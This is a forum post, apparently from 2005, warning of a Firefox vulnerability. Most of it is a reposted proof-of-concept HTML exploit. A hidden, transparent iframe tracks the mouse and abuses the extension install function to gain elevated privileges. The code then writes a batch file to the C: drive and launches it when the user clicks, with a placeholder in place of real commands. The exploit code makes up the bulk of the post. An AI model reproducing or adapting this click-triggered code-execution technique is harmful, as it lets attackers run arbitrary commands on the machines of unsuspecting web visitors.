Mozilla Firefox 0day Vulnerability

Started by DarkMew May 8th, 2005 3:54 PM
  • 401 views
  • 1 replies
http://localhost
Seen April 4th, 2006
Posted April 4th, 2006
80 posts
18.3 Years
Watch out for this newly discovered Firefox vulnerability.
It is called "0day", the Mozilla people are working to fix it.
This is how it works:
When a user clicks inside a specially crafted web page, the browser
will make a malicious batch file and execute it.
Here is example code:
-----------0day_example.html-------------------------
// FrSIRT Comment - This is a 0day exploit/vulnerability (unpatched)
// If a user clicks anywhere on a specially crafted page, this code will
// automatically create and execute a malicious batch/exe file.
//
// Update (08.05.2005) - The Mozilla Foundation patched (partially) this
// issue on the server side by adding random letters and numbers to the
// install function, which will prevent this exploit from working.

<html><head><title>firefox 0day exploit</title>

<body>Click anywhere inside this page<br>
<br>Advisory - http://www.frsirt.com/english/advisories/2005/0493<br>
<iframe onload="loader()" src="javascript:'<noscript>'+eval('if

(window.name!=\'stealcookies\')
{window.name=\'stealcookies\';} else{ event={target:

{href:\'http://ftp.mozilla.org/pub/
mozilla.org/extensions/flashgot/flashgot-0.5.9.1-fx+mz+tb.xpi\'}};install

(event,\'You are
vulnerable!!!\',\'javascript:eval

(\\\'netscape.security.PrivilegeManager.enablePrivilege(\\\\\\\'
UniversalXPConnect\\\\\\\');file=Components.classes

[\\\\\\\'@mozilla.org/file/local;1\\\\\\\'].
createInstance(Components.interfaces.nsILocalFile);file.initWithPath

(\\\\\\\'c:\\\\\\\\\\\\\\\\
booom.bat\\\\\\\');file.createUnique

(Components.interfaces.nsIFile.NORMAL_FILE_TYPE,420);
outputStream=Components.classes[\\\\\\\'@mozilla.org/network/file-output-

stream;1\\\\\\\'].
createInstance

(Components.interfaces.nsIFileOutputStream);outputStream.init

(file,0x04|0x08
|0x20,420,0);output=\\\\\\\'@ECHO off\\\\\\\\ncls\\\\\\\\nECHO malicious

commands here...
\\\\\\\\nPAUSE\\\\\\\';outputStream.write

(output,output.length);outputStream.close();file.launch();
\\\')\'); }')+'</noscript><a

href=\'https://addons.update.mozilla.org/extensions/moreinfo.php?
id=220&application=firefox\'

style=\'cursor:default;\'>&nbsp;&nbsp;&nbsp;</'+'a>'"
id="targetframe" scrolling="no" frameborder="0" marginwidth="0"

marginheight=0" style=
"position:absolute; left:0px; width:0px; height:6px; width:6px; margin:0px;

padding:0px;
-moz-opacity:0"></iframe>


<script language="JavaScript" type="text/javascript">

document.onmousemove = function trackMouse(e) {
document.getElementById("targetframe").style.left = (e.pageX-3)+"px"
document.getElementById("targetframe").style.top = (e.pageY-3)+"px"
}

var counter = 0;
function loader() {
counter++
if(counter == 1) {
stealcookies.focus()
} else if(counter == 2) {
stealcookies.history.go(-1)
//targetframe.style.display="none";
}
}
</script>
</body>
</html>
---------------------------end-------------------------------------
This bug will probably be fixed soon.
~DarkMew


"If you're not with me, you're my enemy."
-Darth Vader, Revenge of the Sith

"All your base are belong to us."
-CATS, Zero Wing